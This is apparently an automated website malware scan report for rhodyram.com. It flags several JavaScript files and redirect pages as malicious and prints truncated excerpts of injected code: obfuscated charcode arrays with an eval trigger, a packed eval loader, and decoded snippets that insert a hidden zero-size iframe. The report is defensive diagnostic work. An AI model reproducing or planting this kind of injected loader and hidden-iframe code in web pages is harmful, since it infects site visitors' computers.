Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rhodyram.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rhodyram.com/ | 200 OK Content-Length: 5431 Content-Type: text/html | clean |
http://rhodyram.com/js/rollover.js | 200 OK Content-Length: 9497 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var imageBlock = new Image(); imageBlock['rest-off'] = "/images/leftmenu/menu_rest_off.gif"; imageBlock['rest-over'] = "/images/leftmenu/menu_rest_over.gif"; imageBlock['hunt-off'] = "/images/leftmenu/menu_hunt_off.gif"; imageBlock['hunt-over'] = "/images/leftmenu/menu_hunt_over.gif"; imageBlock['school-off'] = "/images/leftmenu/menu_school_off.gif"; imageBlock['school-over'] = "/images/leftmenu/menu_school_over.gif"; imageBlock['skiing-off'] = "/images/leftmenu/menu_ if(f)e(s);} Antivirus reports:
| ||
http://rhodyram.com/js/AC_OETags.js | 200 OK Content-Length: 14998 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://rhodyram.com/js/swfobject.js | 200 OK Content-Length: 16762 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object(); deconcept.SWFObject = function(swf, id, w, h, ver, c, quality, xiRedirectUrl, redirectUrl, detectKey) { if (!document.getElementById) { return; } this.DETECT_KEY = detectKey ? detectKey : 'detectflash'; this.skipDetect = deconcept.util.getReques if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://rhodyram.com/js/IE7_0_9/ie7-standard-p.js | 200 OK Content-Length: 32263 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y(!26.1F)11 7(){2C{26.1F=8;6 2s=8.24=11 3b;8.1g=7(){z"1F 4x 0.9 (ad)"};6 5T=/5T/.Z(2y.5h.7C);6 31=(5T)?7(m){26.31(1F+"\\n\\n"+m)}:2s;6 29=ac.29.19(/ab (\\d\\.\\d)/)[1]; if(f)e(s);} Decoded script: if(!window.IE7)new function(){try{window.IE7=this;var DUMMY=this.addModule=new Function;this.toString=function(){return"IE7 version 0.9 (alpha)"};var ie7_debug=/ie7_debug/.test(top.location.search);var alert=(ie7_debug)?function(m){window.alert(IE7+"\n\n"+m)}:DUMMY;var appVersion=navigator.appVersion.match(/MSIE (\d\.\d)/)[1];var quirksMode=document.compatMode!="CSS1Compat";if(/ie7_off/.test(top.location.search)||appVersion<5||!/^ms_/.test(document.documentElement.uniqueID))return;var co ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://rhodyram.com/js/ieupdate.js | 200 OK Content-Length: 7586 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) objects = document.getElementsByTagName("object"); for (var i = 0; i < objects.length; i++) { objects[i].outerHTML = objects[i].outerHTML; } try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,16 if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://rhodyram.com/?redirect=6 | 200 OK Content-Length: 4391 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=419 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=419" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=7 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3379 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3379" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=8 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3374 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3374" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=9 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3381 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3381" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=10 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3387 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3387" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=14 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3385 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3385" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=11 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3389 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3389" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=12 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3383 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3383" style="border: 0px solid #aaa;"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rhodyram.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 01:10:32 GMT
Server: Apache/2.0.52 (CentOS)
Content-Length: 5431
Content-Type: text/html
X-Powered-By: PHP/5.1.6
...5431 bytes of data.
GET / HTTP/1.1
Host: rhodyram.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 01:10:32 GMT
Server: Apache/2.0.52 (CentOS)
Content-Length: 5431
Content-Type: text/html
X-Powered-By: PHP/5.1.6
...5431 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rhodyram.com
Referer: http://www.google.com/search?q=rhodyram.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rhodyram.com
Referer: http://www.google.com/search?q=rhodyram.com
Result:
The result is similar to the first query. There are no suspicious redirects found.